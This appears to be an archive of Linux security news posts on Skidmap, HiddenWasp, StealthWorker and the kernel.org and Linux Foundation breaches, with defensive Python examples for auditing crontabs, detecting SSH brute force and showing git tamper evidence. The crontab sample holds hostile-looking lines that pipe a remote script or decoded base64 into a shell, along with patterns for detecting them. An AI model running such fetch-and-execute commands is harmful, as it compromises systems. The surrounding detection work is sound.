Skidmap, Linux Malware Mining Cryptocurrency in Disguise



Security researchers have discovered a new strain of Linux malware that does far more than illegally mine cryptocurrency: by installing a "secret master password" it gives the attackers universal access to the system.

Skidmap shows how cryptocurrency-mining malware is growing more complex, and how prevalent such threats have become.

To mine cryptocurrency without being noticed, Skidmap forges CPU-related statistics and network traffic, according to Trend Micro's recent blog post on the subject.

Highlighting the advanced methods used by Skidmap, researchers at Trend Micro said, "Skidmap uses fairly advanced methods to ensure that it and its components remain undetected. For instance, its use of LKM rootkits — given their capability to overwrite or modify parts of the kernel — makes it harder to clean compared to other malware."

“Cryptocurrency-mining threats don’t just affect a server or workstation’s performance — they could also translate to higher expenses and even disrupt businesses especially if they are used to run mission-critical operations,” reads the blog.

How does the infection take place?

It starts with crontab, the standard Unix/Linux facility for scheduling tasks to run at fixed times. Skidmap then installs its malicious binaries and weakens the affected machine's security settings so that the cryptocurrency mining can run undisturbed.

While the miners generate digital money for the attackers, additional binaries planted on the system monitor them.

To stay protected against this kind of cryptocurrency-mining malware, administrators are advised to keep servers and machines updated and patched, and to be wary of unverified repositories.
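The crontab step described above is the one part of this chain an administrator can inspect directly. The Python below is an added example, not code from the Trend Micro write-up or from this page: it parses a system crontab in /etc/crontab format (schedule fields, user, command) and flags the patterns that commonly accompany a malicious scheduled task, such as fetching a remote script straight into a shell, executing from temporary or hidden directories, and decoding base64 into a shell. The crontab text and the IP address are constructed sample data, and the rule set is my assumption about what to look for; the page itself lists no specific indicators.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample in /etc/crontab format: 5 schedule fields, user, command.
# The IP address is from the TEST-NET-2 documentation range, not a real host.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/1 * * * *     root    curl -fsSL http://198.51.100.7/pm.sh | sh
@reboot         root    /var/tmp/.cache/miner -c /var/tmp/.cache/config.json
0 3 * * *       backup  /usr/local/bin/backup.sh --rotate
*/5 * * * *     root    echo dGVzdAo= | base64 -d | bash
"""

# Detection rules (assumed indicators, name -> regex applied to the command part).
SUSPICIOUS = [
    ("remote-fetch-to-shell", re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b")),
    ("exec-from-temp-dir", re.compile(r"(^|\s)/(var/)?tmp/|(^|\s)/dev/shm/")),
    ("hidden-path", re.compile(r"/\.[^/\s]+/")),
    ("base64-decode-to-shell", re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(ba)?sh\b")),
]


@dataclass
class Finding:
    line_no: int
    user: str
    command: str
    rule: str


def parse_system_crontab(text: str) -> List[Tuple[int, str, str, str]]:
    """Return (line_no, schedule, user, command) for each job line.

    Comments, blank lines and VAR=value assignments are skipped. A job either
    starts with an @keyword (one schedule field) or has five schedule fields.
    """
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        if line.startswith("@"):
            parts = line.split(None, 2)
            if len(parts) < 3:
                continue
            schedule, user, command = parts
        else:
            parts = line.split(None, 6)
            if len(parts) < 7:
                continue
            schedule, user, command = " ".join(parts[:5]), parts[5], parts[6]
        entries.append((n, schedule, user, command))
    return entries


def audit_crontab(text: str) -> List[Finding]:
    """Apply every rule to every job's command; one finding per (job, rule) match."""
    findings = []
    for n, _schedule, user, command in parse_system_crontab(text):
        for name, pattern in SUSPICIOUS:
            if pattern.search(command):
                findings.append(Finding(n, user, command, name))
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no} ({f.user}): {f.rule}: {f.command}")
```

On a real host the same function can be pointed at the contents of /etc/crontab and the files under /etc/cron.d; per-user crontabs (crontab -l) omit the user field and need the six-field variant of the split.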


Undetected malware attacks Linux systems

HiddenWasp is a new, sophisticated and unusual Linux malware used in targeted attacks against victims who are already under attack or have already been subjected to heavy reconnaissance.

The malware is highly sophisticated and went undetected; it is still active and has a zero detection rate. It borrows a large amount of code from publicly available malware such as Mirai and the Azazel rootkit.

Unlike Windows malware authors, Linux malware authors generally do not invest much in evasion techniques, because anti-virus solutions are far less commonly deployed on Linux machines than on other platforms.

However, the Intezer report shows “malware with strong evasion techniques does exist for the Linux platform. There is also a high ratio of publicly available open-source malware that utilizes strong evasion techniques and can be easily adapted by attackers.” In the past, much Linux malware focused on crypto-mining or DDoS activity, but HiddenWasp is purely a targeted remote-control attack.

The malware is composed of a user-mode rootkit, a trojan and an initial deployment script. Researchers found that the files went undetected on VirusTotal and that the malware was hosted on servers of ThinkDream, a hosting company located in Hong Kong.

While analysing the scripts, Intezer spotted a user named ‘sftp’ together with hardcoded values that can be used for initial compromise; the scripts also contain a variable used to clear older versions of the malware from compromised systems.

The scripts also include variables that determine the architecture of the compromised server and download the matching components from the malicious server. Once the components are installed, the trojan is executed on the system.

“Within this script, we were able to observe that the main implants were downloaded in the form of tarballs. As previously mentioned, each tarball contains the main trojan, the rootkit, and a deployment script for x86 and x86_64 builds accordingly.”

StealthWorker: Manipulates Compromised E-Commerce Websites To Attack Windows and Linux Platforms




A new brute-force malware which goes by the name of StealthWorker was recently uncovered. This malware allegedly uses compromised e-commerce websites to steal personal data.

The platforms mainly affected by this malware are Linux and Windows.

Personal information and payment data are the basic motivations behind these malware attacks.

The malware is written in Golang, a language rarely used for malware, which has also been used in the Mirai botnet's development module.

To make this happen, the e-commerce websites are first compromised by planting an embedded skimmer.

The websites are compromised either by exploiting plugin vulnerabilities or by exploiting the Content Management System (CMS) itself.

The malware emerged while the researchers were analyzing the command and control server (5.45.69[.]149).

That is where they found a storage directory with samples intended to brute-force an admin tool.

Previous versions of this malware had only Windows on their radar.

The latest version, however, also carries server payload binaries for Linux.

One of the samples the researchers worked on is “PhpMyAdminBrut_Windows_x86.exe”, in which an IP address was found that led to a web panel login and an array of new samples.

Open directories were also found containing new file names that pointed to IoT devices with ARM and MIPS architectures.

StealthWorker sets up a scheduled execution routine so that it persists even after the system is rebooted.

The researchers also used an IDA Python script to look for other malicious functions.

The research also found other platforms and services on the target list, namely FTP, Joomla, cPanel, MySQL, SSH and others.

Furthermore, the cybercriminals are making other major moves towards infecting an extensive variety of platforms.
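Brute-force tooling of the kind described above leaves a recognisable trace in authentication logs: a burst of failures from one source, often spread over many usernames, sometimes followed by a success. The Python below is an added example, not code from the researchers or from this page, and it covers the SSH service from the target list: it parses sshd lines in traditional syslog format, keeps a sliding window of failures per source address, raises one alert per source once a threshold is crossed, and marks whether a login from that source later succeeded. The log lines, host name, addresses (documentation ranges) and the year used for the year-less syslog timestamps are all constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed sshd lines in traditional syslog format (no year field).
SAMPLE_AUTH_LOG = """\
Sep 10 12:00:01 web1 sshd[2201]: Failed password for invalid user admin from 203.0.113.5 port 40122 ssh2
Sep 10 12:00:02 web1 sshd[2203]: Failed password for invalid user test from 203.0.113.5 port 40124 ssh2
Sep 10 12:00:02 web1 sshd[2205]: Failed password for root from 203.0.113.5 port 40126 ssh2
Sep 10 12:00:03 web1 sshd[2207]: Failed password for invalid user oracle from 203.0.113.5 port 40128 ssh2
Sep 10 12:00:04 web1 sshd[2209]: Failed password for invalid user postgres from 203.0.113.5 port 40130 ssh2
Sep 10 12:00:05 web1 sshd[2213]: Accepted password for root from 203.0.113.5 port 40132 ssh2
Sep 10 12:00:09 web1 sshd[2211]: Accepted publickey for deploy from 198.51.100.23 port 51000 ssh2
Sep 10 12:05:00 web1 sshd[2300]: Failed password for alice from 192.0.2.10 port 53120 ssh2
Sep 10 12:05:40 web1 sshd[2302]: Accepted password for alice from 192.0.2.10 port 53122 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) \S+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

# Syslog timestamps carry no year; 2011 is a constructed assumption for the sample.
LOG_YEAR = 2011


def parse_events(text: str, year: int = LOG_YEAR) -> List[Tuple[datetime, str, str, bool]]:
    """Return (timestamp, source, username, failed) for each recognised sshd line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
        events.append((ts, m["src"], m["user"], m["outcome"] == "Failed"))
    return events


def detect_bruteforce(text: str, threshold: int = 5, window_seconds: int = 60) -> Dict[str, dict]:
    """Alert on any source with >= threshold failures inside a sliding window.

    Each alert records how many distinct usernames were tried (a spray signature)
    and whether the same source later authenticated successfully, which is the
    case that needs immediate incident response rather than a blocklist entry.
    """
    recent: Dict[str, deque] = defaultdict(deque)  # src -> failure timestamps in window
    tried: Dict[str, set] = defaultdict(set)       # src -> usernames attempted
    alerts: Dict[str, dict] = {}
    for ts, src, user, failed in sorted(parse_events(text)):
        if failed:
            q = recent[src]
            q.append(ts)
            tried[src].add(user)
            while (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and src not in alerts:
                alerts[src] = {
                    "first_seen": q[0],
                    "last_seen": ts,
                    "failures": len(q),
                    "distinct_users": len(tried[src]),
                    "succeeded_after_burst": False,
                }
        elif src in alerts:
            alerts[src]["succeeded_after_burst"] = True
    return alerts


if __name__ == "__main__":
    for src, info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(src, info)
```

The same structure applies to the other services on the list (FTP, phpMyAdmin, cPanel): only LINE_RE changes, the windowing and the "success after burst" logic stay the same.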

Hacker Group makes Nintendo Switch a Linux machine

As reported earlier this month, Hacker Group fail0verflow had tweeted a picture showing that they had managed to run Linux on Nintendo Switch. That was February 6; now, 12 days later, they have released a video on their account, providing proof of the same.

The video shows a Switch console running a Linux-based desktop environment KDE Plasma, with full touchscreen support and a web browser, something which the gaming console did not originally have.


While usually people hack into gaming consoles to play cracked versions of games, some people just enjoy running whatever kind of software they want on them. This seems to be one of those cases.

Fail0verflow is a hacking group that focuses its hacking efforts on gaming consoles and has recently taken up Nintendo Switch, as have many others.

While the hacking group has still not made public its exact method and code, it reportedly involves exploiting a flaw in the boot ROM of the Switch’s Nvidia Tegra X1 chip. As they revealed last time, the video maintains that the flaw cannot be patched by Nintendo on current devices, but allegedly could be addressed in future production.

Fedora 16 Linux Released (Codename "Verne")



Today Fedora 16 (codename "Verne") was released. Powered by the newly released Linux kernel 3.1, it features the GNOME 3.2.1 desktop environment with the GNOME Shell interface and the KDE Software Compilation 4.7.2 environment. Fedora 16 also includes OpenStack, many SELinux enhancements, updated Haskell, Perl and Ada environments, Blender 2.5, Boost 1.47, TigerVNC 1.1, and much more.

The following are major features for Fedora 16:

  • Enhanced cloud support including Aeolus Conductor, Condor Cloud, HekaFS, OpenStack and pacemaker-cloud
  • KDE Plasma workspaces 4.7
  • GNOME 3.2
  • A number of core system improvements including GRUB 2 and the removal of HAL.
  • An updated libvirtd, trusted boot, guest inspection, virtual lock manager and a pvops based kernel for Xen all improve virtualization support.
Full feature list here


Ubuntu 11.10 (Oneiric Ocelot) is Released ~ Upgrade Now


Recently, Ubuntu released Ubuntu 11.10. If you are interested in how it looks or how it works, you can take the tour. It is available in 38 languages. Ubuntu is free to use; if you haven't used Ubuntu yet, give it a try now with Ubuntu 11.10.

You can download the full operating system from here:
http://www.ubuntu.com/download
or
if you have installed Ubuntu 11.04, you will be asked to upgrade to Ubuntu 11.10 (that's how I came to know about it).
  
Ubuntu 11.10: Open for business
Make your IT budget go further with Ubuntu! The latest release of Ubuntu includes everything you need for your business desktop, server and cloud.

The user interface looks good. I am curious to use it right now, but my net connection.



Linux Application WineHQ database Hacked

The WineHQ database system has been compromised. WineHQ (Wine) is a Linux application that lets you run Windows .exe files inside Linux. The hacker may have gained access by compromising an admin's credentials or by exploiting an unpatched vulnerability in phpMyAdmin.

They had reluctantly provided phpMyAdmin access to the AppDB developers (it is a very handy tool, and something they very much wanted). But it is a prime target for hackers, and apparently their best efforts at obscuring it and patching it were not sufficient.

They have now removed all outside access to phpMyAdmin.

So far there is no sign of damage to the database. Unfortunately, the attackers were able to download the full login database for both the AppDB and Bugzilla. This means that they have all of those email addresses as well as the passwords. The passwords are stored as hashes (not in plaintext), but with enough effort, and depending on the quality of a password, they can be cracked.

The WineHQ administrator is worried about users' information: the attackers could use it to gain access to users' accounts. So he plans to reset the passwords and email the new ones to each user.

Security Tips from BreakTheSec:
  • Don't use the same password everywhere (in particular, use a different, secure password for your Gmail account and other important accounts).
  • WineHQ users: if you use the same password anywhere else, change it immediately.



Ubuntu 10.10 vulnerable to system crash and DoS attack

The kernel incorrectly handled certain VLAN packets: a remote attacker could send specially crafted traffic to crash the system, leading to a denial of service. The EFI GUID partition table was also not correctly parsed: a physically local attacker who could insert mountable devices could exploit this to crash the system or possibly gain root privileges.
==========================================================================
Ubuntu Security Notice USN-1220-1
September 29, 2011

linux-ti-omap4 vulnerabilities
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 10.10

Summary:

Multiple kernel flaws have been fixed.

Software Description:
- linux-ti-omap4: Linux kernel for OMAP4

Details:

Ryan Sweat discovered that the kernel incorrectly handled certain VLAN
packets. On some systems, a remote attacker could send specially crafted
traffic to crash the system, leading to a denial of service.
(CVE-2011-1576)

Timo Warns discovered that the EFI GUID partition table was not correctly
parsed. A physically local attacker that could insert mountable devices
could exploit this to crash the system or possibly gain root privileges.
(CVE-2011-1776)

Dan Rosenberg discovered that the IPv4 diagnostic routines did not
correctly validate certain requests. A local attacker could exploit this to
consume CPU resources, leading to a denial of service. (CVE-2011-2213)

Dan Rosenberg discovered that the Bluetooth stack incorrectly handled
certain L2CAP requests. If a system was using Bluetooth, a remote attacker
could send specially crafted traffic to crash the system or gain root
privileges. (CVE-2011-2497)

Mauro Carvalho Chehab discovered that the si4713 radio driver did not
correctly check the length of memory copies. If this hardware was
available, a local attacker could exploit this to crash the system or gain
root privileges. (CVE-2011-2700)

Herbert Xu discovered that certain fields were incorrectly handled when
Generic Receive Offload (CVE-2011-2723)

Timo Warns discovered that long symlinks were incorrectly handled on Be
filesystems. A local attacker could exploit this with a malformed Be
filesystem and crash the system, leading to a denial of service.
(CVE-2011-2928)

Dan Kaminsky discovered that the kernel incorrectly handled random sequence
number generation. An attacker could use this flaw to possibly predict
sequence numbers and inject packets. (CVE-2011-3188)

Darren Lavender discovered that the CIFS client incorrectly handled certain
large values. A remote attacker with a malicious server could exploit this
to crash the system or possibly execute arbitrary code as the root user.
(CVE-2011-3191)

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 10.10:
linux-image-2.6.35-903-omap4 2.6.35-903.25

After a standard system update you need to reboot your computer to make
all the necessary changes.

References:
http://www.ubuntu.com/usn/usn-1220-1
CVE-2011-1576, CVE-2011-1776, CVE-2011-2213, CVE-2011-2497,
CVE-2011-2700, CVE-2011-2723, CVE-2011-2928, CVE-2011-3188,
CVE-2011-3191

Package Information:
https://launchpad.net/ubuntu/+source/linux-ti-omap4/2.6.35-903.25


Update about Linux Foundation Security Breach

Last week, Linux Foundation websites were hacked by unknown attackers, so all Linux Foundation websites were taken down for maintenance. They put a message about the security breach on their main page. Linux.com is still under maintenance. The following is the official FAQ from Linux.com about the security breach.


We want to thank you for your questions and your support. We hope this FAQ can help address some of your inquiries.
Q: When will Linux Foundation services, such as events, training and Linux.com be back online?
Our team is working around the clock to restore these important services. We are working with authorities and exercising both extreme caution and diligence. Services will begin coming back online in the coming days and will keep you informed every step of the way.
Q: Were passwords stored in plaintext?
The Linux Foundation does not store passwords in plaintext. However an attacker with access to stored password would have direct access to conduct a brute force attack. An in-depth analysis of direct-access brute forcing, as it relates to password strength, can be read at http://www.schneier.com/blog/archives/2007/01/choosing_secure.html. We encourage you to use extreme caution, as is the case in any security breach, and discontinue the use of that password if you re-use it across other sites.
Q: Does my Linux.com email address work?
Yes, Linux.com email addresses are working and safe to use.
Q: What do you know about the source of the attack?
We are aggressively investigating the source of the attack. Unfortunately, we can't elaborate on this for the time being.
Q: Is there anything I can do to help?
We want to thank everyone who has expressed their support while we address this breach. We ask you to be patient as we do everything possible to restore services as quickly as possible.


Linux Foundation Websites (kernel.org, linux.com) Hacked ~ Security Breach


Shocking news for those who think Linux is secure: the websites belonging to the Linux Foundation have been attacked. Hackers breached Linux.com, linuxfoundation.org and www.kernel.org yesterday.

The sites have been taken down with a notice put up stating that the sites are down for maintenance due to a security breach. The breach was said to have been discovered on the 8th of September, this year.

Last month a security breach hit kernel.org (intruders gained root access on the server Hera...)

The notice also cautions users that any passwords that might have been used on any of the services might have been compromised. If those same passwords were used on any other services, it’s recommended that they be changed.

The site is still down for maintenance. 

The message from the Linux Foundation:
When I tried to visit linux.com, I got this:
-----------------------------------------------------------------------------------------------------------------------
Linux Foundation infrastructure including LinuxFoundation.org, Linux.com, and their subdomains are down for maintenance due to a security breach that was discovered on September 8, 2011. The Linux Foundation made this decision in the interest of extreme caution and security best practices. We believe this breach was connected to the intrusion on kernel.org.

We are in the process of restoring services in a secure manner as quickly as possible. As with any intrusion and as a matter of caution, you should consider the passwords and SSH keys that you have used on these sites compromised. If you have reused these passwords on other sites, please change them immediately. We are currently auditing all systems and will update this statement when we have more information.

We apologize for the inconvenience. We are taking this matter seriously and appreciate your patience. The Linux Foundation infrastructure houses a variety of services and programs including Linux.com, Open Printing, Linux Mark, Linux Foundation events and others, but does not include the Linux kernel or its code repositories.

Please contact us at info@linuxfoundation.org with questions about this matter.

The Linux Foundation
-----------------------------------------------------------------------------------------------------------------------


Kernel.org, the victim of the attack, is critical to the Linux movement as it houses the Linux kernel itself. The servers are being completely reinstalled from scratch. There was some fear that the hackers might have modified the kernel's code, but kernel.org has made it clear that this is not the case: each code file is hash-verified, so no alteration can go unnoticed. A check will be done to ensure that no changes have been made.

The news of this hacking might come as a surprise to some, as it’s popular belief that sites running on Linux are almost impossible to hack.

Security breach on kernel.org

A security breach occurred on kernel.org. This is the announcement from their official website:

Earlier this month, a number of servers in the kernel.org infrastructure were compromised. We discovered this August 28th. While we currently believe that the source code repositories were unaffected, we are in the process of verifying this and taking steps to enhance security across the kernel.org infrastructure.


What happened?


  •  Intruders gained root access on the server Hera. We believe they may have gained this access via a compromised user credential; how they managed to exploit that to root access is currently unknown and is being investigated.
  •  Files belonging to ssh (openssh, openssh-server and openssh-clients) were modified and running live.
  • A trojan startup file was added to the system start up scripts
  •  User interactions were logged, as well as some exploit code. We have retained this for now.
  •  Trojan initially discovered due to the Xnest /dev/mem error message w/o Xnest installed; have been seen on other systems. It is unclear if systems that exhibit this message are susceptible, compromised or not. If developers see this, and you don't have Xnest installed, please investigate.
  •  It *appears* that 3.1-rc2 might have blocked the exploit injector; we don't know if this is intentional or a side effect of another bugfix or change.


What Has Been Done so far:

  •  We have currently taken boxes off line to do a backup and are in the process of doing complete reinstalls.
  •  We have notified authorities in the United States and in Europe to assist with the investigation
  •  We will be doing a full reinstall on all boxes on kernel.org
  •  We are in the process of doing an analysis on the code within git, and the tarballs to confirm that nothing has been modified

The Linux community and kernel.org take the security of the kernel.org domain extremely seriously, and are pursuing all avenues to investigate this attack and prevent future ones.


However, it's also useful to note that the potential damage of cracking kernel.org is far less than typical software repositories. That's because kernel development takes place using the git distributed revision control system, designed by Linus Torvalds. For each of the nearly 40,000 files in the Linux kernel, a cryptographically secure SHA-1 hash is calculated to uniquely define the exact contents of that file. Git is designed so that the name of each version of the kernel depends upon the complete development history leading up to that version. Once it is published, it is not possible to change the old versions without it being noticed.


Those files and the corresponding hashes exist not just on the kernel.org machine and its mirrors, but on the hard drives of each several thousand kernel developers, distribution maintainers, and other users of kernel.org. Any tampering with any file in the kernel.org repository would immediately be noticed by each developer as they updated their personal repository, which most do daily.


We are currently working with the 448 users of kernel.org to change their credentials and change their SSH keys.


We are also currently auditing all security policies to make kernel.org more secure, but are confident that our systems, specifically git, have excellent design to prevent real damage from these types of attacks.

Source: Kernel
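The kernel.org statement above rests on two properties of git: every file is named by a SHA-1 of its exact contents, and every commit is named by a hash that covers its tree and its parent, so the name of any version depends on the whole history before it. The Python below is an added example, not code from kernel.org or from this page, that reproduces git's real object hashing (SHA-1 over "<type> <size>\0<payload>", the same construction git hash-object uses) for blobs, flat trees and commits, builds a two-commit history over a constructed miniature "kernel", and shows that silently altering a file in the first commit changes every commit id after it. The file contents, author identity and timestamp are constructed; the object format is git's own.

```python
import hashlib
from typing import Dict, List, Optional


def git_object_id(kind: str, payload: bytes) -> str:
    """SHA-1 over git's object framing: "<type> <size>\\0<payload>".
    This is exactly how git names blobs, trees and commits."""
    header = f"{kind} {len(payload)}\0".encode()
    return hashlib.sha1(header + payload).hexdigest()


def blob_id(content: bytes) -> str:
    """Object id of a file's contents (what `git hash-object` prints)."""
    return git_object_id("blob", content)


def tree_id(files: Dict[str, bytes]) -> str:
    """Tree object for a flat directory of regular files (mode 100644).
    Each entry is "<mode> <name>\\0" followed by the 20 raw hash bytes of the blob,
    entries sorted by name, so the tree id changes if any file's content changes."""
    body = b"".join(
        f"100644 {name}\0".encode() + bytes.fromhex(blob_id(files[name]))
        for name in sorted(files)
    )
    return git_object_id("tree", body)


def commit_id(tree: str, parent: Optional[str], message: str) -> str:
    """Commit object: tree id, parent id (if any), author/committer, message.
    The identity and timestamp are constructed and fixed so the example is deterministic."""
    lines = [f"tree {tree}"]
    if parent is not None:
        lines.append(f"parent {parent}")
    ident = "Example Dev <dev@example.invalid> 1315000000 +0000"  # constructed
    lines += [f"author {ident}", f"committer {ident}", "", message]
    return git_object_id("commit", ("\n".join(lines) + "\n").encode())


def build_history(snapshots: List[Dict[str, bytes]]) -> List[str]:
    """One commit per snapshot, each chained to the previous one via its parent id."""
    ids: List[str] = []
    parent: Optional[str] = None
    for n, files in enumerate(snapshots, 1):
        parent = commit_id(tree_id(files), parent, f"snapshot {n}")
        ids.append(parent)
    return ids


def first_divergence(a: List[str], b: List[str]) -> Optional[int]:
    """Index of the first commit whose id differs between two histories, or None if
    they are identical. This is what a developer's `git fetch` effectively detects."""
    for i, (x, y) in enumerate(zip(a, b)):
        if x != y:
            return i
    return None if len(a) == len(b) else min(len(a), len(b))


# Constructed miniature "kernel": two snapshots, the second adds a file.
ORIGINAL: List[Dict[str, bytes]] = [
    {"Makefile": b"VERSION = 3\n", "main.c": b"int main(void) { return 0; }\n"},
    {"Makefile": b"VERSION = 3\n", "main.c": b"int main(void) { return 0; }\n",
     "README": b"Linux kernel\n"},
]

# Same history, but a file in the *first* snapshot is silently altered on the server.
TAMPERED: List[Dict[str, bytes]] = [dict(s) for s in ORIGINAL]
TAMPERED[0]["main.c"] = b"int main(void) { /* altered */ return 0; }\n"

if __name__ == "__main__":
    orig, tam = build_history(ORIGINAL), build_history(TAMPERED)
    print("original:", orig)
    print("tampered:", tam)
    print("first divergence at commit index", first_divergence(orig, tam))
```

Because the second snapshot's files are untouched, its tree id is identical in both histories; its commit id still differs, purely because its parent differs. Any mirror or developer holding the original ids would see the mismatch on the next fetch, which is the argument the statement makes.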


Backbox.org - Linux Distribution Website Hacked

BackBox is a Linux distribution based on Ubuntu Lucid 10.04 LTS, developed for penetration testing and security assessments. It is designed to be fast and easy to use, and to provide a minimal yet complete desktop environment, thanks to its own software repositories, which are always kept updated to the latest stable versions of the best-known ethical hacking tools.


Top 10 Reasons Why Linux is better than Windows

1. It Doesn't Crash

Linux has been time-proven to be a reliable operating system. Although the desktop is not a new place for Linux, most Linux-based systems have been used as servers and embedded systems. High-visibility Web sites such as Google use Linux-based systems, but you can also find Linux inside the TiVo set-top box in many living rooms.